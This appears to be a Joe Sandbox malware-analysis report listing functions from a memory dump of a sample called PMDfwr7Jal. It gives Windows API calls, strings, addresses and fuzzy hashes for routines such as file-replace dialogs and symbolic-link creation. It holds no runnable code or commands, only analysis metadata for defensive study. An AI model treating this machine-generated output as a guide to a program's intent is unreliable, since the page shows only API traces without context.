Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a1bf64f4ee08b4dabf5f69ffec6b54703e73d5570b70163be008af41b70a8d5e
Instruction ID: 5fb6080343d4b23a9f21af9cf363ed67836b75943bdcb0491a8de30312b70860
Opcode Fuzzy Hash: a1bf64f4ee08b4dabf5f69ffec6b54703e73d5570b70163be008af41b70a8d5e
Instruction Fuzzy Hash: E2A001EA2AD126BC312862657E2BD7A022CD4C4B65B31891AB91A94081AA989D495435

Uniqueness

Uniqueness Score: -1.00%

Function 00719EBF Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,00719104,?,?,-00001964), ref: 00719EC2

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: a47bbad97cce12e65346c3501aa5956735f315e36e9b9603f4727a218632928f
Instruction ID: c99ad56379e16fe2cf98b8c35253fbef361898e386b12e0091e07b00666b7cef
Opcode Fuzzy Hash: a47bbad97cce12e65346c3501aa5956735f315e36e9b9603f4727a218632928f
Instruction Fuzzy Hash: 37B011380A000A8A8E002F30CC088283A22EA2230A30282A2A00ACA0B0CB22C002AA00

Uniqueness

Uniqueness Score: -1.00%

Function 0072A322 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,0072A587,C:\Users\user\Desktop,00000000,0075946A,00000006), ref: 0072A326

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 2104bf188eed29baee5a03ad893ab28eb91b810f329cc4ea34cc1874818a2a68
Instruction ID: 34e75e345111aaf32946c2e3476fafb0aef99df017168d3b2e733af984b4f249
Opcode Fuzzy Hash: 2104bf188eed29baee5a03ad893ab28eb91b810f329cc4ea34cc1874818a2a68
Instruction Fuzzy Hash: D3A0123019400A578A000B30CC09C1576505761702F00C6217006C00A0CB348814A504

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0072B8E0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0071130B: GetDlgItem.USER32(00000000,00003021), ref: 0071134F
Part of subcall function 0071130B: SetWindowTextW.USER32(00000000,007435B4), ref: 00711365

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0072B971
EndDialog.USER32(?,00000006), ref: 0072B984
GetDlgItem.USER32(?,0000006C), ref: 0072B9A0
SetFocus.USER32(00000000), ref: 0072B9A7
SetDlgItemTextW.USER32(?,00000065,?), ref: 0072B9E1
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0072BA18
FindFirstFileW.KERNEL32(?,?), ref: 0072BA2E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0072BA4C
FileTimeToSystemTime.KERNEL32(?,?), ref: 0072BA5C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0072BA78
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0072BA94
_swprintf.LIBCMT ref: 0072BAC4

Part of subcall function 0071400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0071401D

SetDlgItemTextW.USER32(?,0000006A,?), ref: 0072BAD7
FindClose.KERNEL32(00000000), ref: 0072BADE
_swprintf.LIBCMT ref: 0072BB37
SetDlgItemTextW.USER32(?,00000068,?), ref: 0072BB4A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0072BB67
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0072BB87
FileTimeToSystemTime.KERNEL32(?,?), ref: 0072BB97
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0072BBB1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0072BBC9
_swprintf.LIBCMT ref: 0072BBF5
SetDlgItemTextW.USER32(?,0000006B,?), ref: 0072BC08
_swprintf.LIBCMT ref: 0072BC5C
SetDlgItemTextW.USER32(?,00000069,?), ref: 0072BC6F

Part of subcall function 0072A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0072A662
Part of subcall function 0072A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,0074E600,?,?), ref: 0072A6B1

Strings

REPLACEFILEDLG, xrefs: 0072B907
%s %s, xrefs: 0072BB29, 0072BC4E
%s %s %s, xrefs: 0072BAB2, 0072BBE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: 2b01bbdb89d9072a401f1193aa2460f856156d10e77c270446810f8a26f14830
Instruction ID: fd7f8fba33cc2d6a3e766e9a7ce32dff5e4cacc0548496e267ad862e571b2f77
Opcode Fuzzy Hash: 2b01bbdb89d9072a401f1193aa2460f856156d10e77c270446810f8a26f14830
Instruction Fuzzy Hash: C59194B2244348BBD3319BA0DC49FFB77ACEB4A740F044919F789D2091D779AA45CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0071718C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00717191
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 007172F1
CloseHandle.KERNEL32(00000000), ref: 00717301

Part of subcall function 00717BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00717C04
Part of subcall function 00717BF5: GetLastError.KERNEL32 ref: 00717C4A
Part of subcall function 00717BF5: CloseHandle.KERNEL32(?), ref: 00717C59

CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 0071730C
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 0071741A
DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00717446
CloseHandle.KERNEL32(?), ref: 00717457
GetLastError.KERNEL32 ref: 00717467
RemoveDirectoryW.KERNEL32(?), ref: 007174B3
DeleteFileW.KERNEL32(?), ref: 007174DB

Strings

SeCreateSymbolicLinkPrivilege, xrefs: 007171BC
\??\, xrefs: 00717217
SeRestorePrivilege, xrefs: 007171B2
UNC\, xrefs: 0071723C

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3935142422-3508440684
Opcode ID: 91e81013af35e2ac974e3f53dfea2e0885acdac694bab1a42f79a3965ffc23f7
Instruction ID: c55a5ef1972b6d1eacfee05aa61ac377d69f7b5af99e93d25eb30c3803a9ad2e
Opcode Fuzzy Hash: 91e81013af35e2ac974e3f53dfea2e0885acdac694bab1a42f79a3965ffc23f7
Instruction Fuzzy Hash: 9BB1E371904255EBDF24DBA8DC45FEE77B8AF04300F104569F949E7182D73CAA89CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00713281 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 608COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0071328A
_memcmp.LIBVCRUNTIME ref: 00713377

Strings

h%u, xrefs: 0071362D
CMT, xrefs: 00713990
hc%u, xrefs: 0071367B

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: H_prolog_memcmp
String ID: CMT$h%u$hc%u
API String ID: 3004599000-3282847064
Opcode ID: f442b9ecb5eae4f64c8cffbac0a62cd98fd9afca3562726d5c2cd2989e758238
Instruction ID: a7c3e3d342385709d2cfa1a98bf82ba37ec84d26c15c9f071f8f55a30af8a02c
Opcode Fuzzy Hash: f442b9ecb5eae4f64c8cffbac0a62cd98fd9afca3562726d5c2cd2989e758238
Instruction Fuzzy Hash: 9D32B8715103849FDF15DF78C899AE937A5AF14300F04457EFD8A9B2C2DB78A989CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0073D00E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0073D154

Strings

1#IND, xrefs: 0073E34C
1#INF, xrefs: 0073E361
1#QNAN, xrefs: 0073E35A
1#SNAN, xrefs: 0073E353

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 92d4a48d005bc1e780eb55f5239a621de85443af741829f612d9c54e1828aba5
Instruction ID: 9f79a45535b1094b22cf88c2fc73505c17d53505214b7b35535382ea3b4f7599
Opcode Fuzzy Hash: 92d4a48d005bc1e780eb55f5239a621de85443af741829f612d9c54e1828aba5
Instruction Fuzzy Hash: FFC23D71E086288FEB35CE28ED447EAB7B5EB44314F1541EAD44DE7242E779AE818F40

Uniqueness

Uniqueness Score: -1.00%

Function 007127E8 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 794COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007127F1
_strlen.LIBCMT ref: 00712D7F

Part of subcall function 0072137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0071B652,00000000,?,?,?,00010472), ref: 00721396

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00712EE0

Strings

CMT, xrefs: 00712F13

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1706572503-2756464174
Opcode ID: 9743cd532bab1c231f32c6f3d3a999d223dbd37f3569e1132536c209ec484165
Instruction ID: 332f012bee947527c2bcfff4f06aac1c7586d2d8253acac82151008f2f51b29c
Opcode Fuzzy Hash: 9743cd532bab1c231f32c6f3d3a999d223dbd37f3569e1132536c209ec484165
Instruction Fuzzy Hash: 3262E171600244CFDF19DF6CC8896EA3BE1AF54300F14457EED9A9B2C3D678A996CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0073866F Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00738767
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00738771
UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 0073877E

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: c2f53a52ad5f3b975a0d89134ee5ca4b9342878b5691e943cdce4664e9ffd14f
Instruction ID: 2cc773b31402d42cd529d4db69ca9ed6f49f49c09a3d49464f00e65f2ef2efcb
Opcode Fuzzy Hash: c2f53a52ad5f3b975a0d89134ee5ca4b9342878b5691e943cdce4664e9ffd14f
Instruction Fuzzy Hash: F931B37590122C9BDB61DF64D889B9CBBB8BF08310F5041EAF91CA7251EB349F858F45

Uniqueness

Uniqueness Score: -1.00%

Function 0073CB60 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
Instruction ID: ba7a53bf4dc2560cdee35542df17210593c105af4ee73ef5c699905e861c179c
Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
Instruction Fuzzy Hash: C5022D72E002199FEF15CFA9C8806ADFBF1EF48314F25816AE919F7385D735A9418B90

Uniqueness

Uniqueness Score: -1.00%

Function 0072A63C Relevance: 3.0, APIs: 2, Instructions: 46COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0072A662
GetNumberFormatW.KERNEL32(00000400,00000000,?,0074E600,?,?), ref: 0072A6B1

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: 233bdf048f5e97cf5e8d75b992ac27263519bd742ca180cff7262603283284be
Instruction ID: 688d2d532fa32e31b3f9d93eb4832ce83101af38f05470adc272e10ed35f4e35
Opcode Fuzzy Hash: 233bdf048f5e97cf5e8d75b992ac27263519bd742ca180cff7262603283284be
Instruction Fuzzy Hash: A6015E7A100358BFD7108F68EC05FABB7BCEF59720F008822FA0997150D3749A1487A9

Uniqueness

Uniqueness Score: -1.00%

Function 00716EC9 Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(0072117C,?,00000200), ref: 00716EC9
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00716EEA

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 822871b8f5e73b3705871577618ff1d9f24cdfb81f577ae3b8210e91bf934922
Instruction ID: e449ab959aff838201d1f76139c99e5113d2e386de4fea1bc312e1fb86458573
Opcode Fuzzy Hash: 822871b8f5e73b3705871577618ff1d9f24cdfb81f577ae3b8210e91bf934922
Instruction Fuzzy Hash: 62D0A7393C4302FFEB100A34DC05F673B617716B42F10C710B316DC0E0C67480189618

Uniqueness

Uniqueness Score: -1.00%

Function 00741194 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0074118F,?,?,00000008,?,?,00740E2F,00000000), ref: 007413C1

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 2228bb9eaeb8e526f63c1b874b4f0b85cf371776812c21182654f1ea5f033727
Instruction ID: 1d39b7d88c3a2db611be72c4fb510b338b05d3455f32ce6b78fb49a9f14e82dd
Opcode Fuzzy Hash: 2228bb9eaeb8e526f63c1b874b4f0b85cf371776812c21182654f1ea5f033727
Instruction Fuzzy Hash: 2DB16C71610608DFD715DF2CC48AB657BE0FF45364FA98698E999CF2A1C339E982CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0071407E Relevance: 1.6, Strings: 1, Instructions: 332COMMON

Download Yara Rule

Strings

gj, xrefs: 007140C1

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: d2eedef5b7397e1bf241710b7cf9ae59d18736f8583062ec7f5291602113cb36
Instruction ID: 2dc9216fc4efbb8bf86f14b5d8bc787fd29d991d8f10e0516773c330a2c1fb05
Opcode Fuzzy Hash: d2eedef5b7397e1bf241710b7cf9ae59d18736f8583062ec7f5291602113cb36
Instruction Fuzzy Hash: ABF1B2B1A083418FD748CF29D880A1AFBE1BFCC208F15896EF598D7711E734E9598B56

Uniqueness

Uniqueness Score: -1.00%

Function 0071ACF5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 0071AD1A

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: adb2f30f6ee068a8d6c85c90c819bc4d77e56d86aa83cb90310116150672e4b6
Instruction ID: bca725c586a78c083b0a3ce4c9468ef7cba9ae35b0accada2ee5a5e0c67340b0
Opcode Fuzzy Hash: adb2f30f6ee068a8d6c85c90c819bc4d77e56d86aa83cb90310116150672e4b6
Instruction Fuzzy Hash: B4F030B8A0170C8FCB28CF18EC416E973B5F759712F208296D919437E8D3B8AD80CE95

Uniqueness

Uniqueness Score: -1.00%

Function 0072F063 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,0072EAC5), ref: 0072F068

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: c52b078f366ed7ef1548c9a9dddb13e23c09e88698fbd7fa25faf049aed17c83
Instruction ID: cb8f1e502fc2985b49dbc17919b095184fd9ca07cffe566de714f0c05b91368e
Opcode Fuzzy Hash: c52b078f366ed7ef1548c9a9dddb13e23c09e88698fbd7fa25faf049aed17c83
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0073B710 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

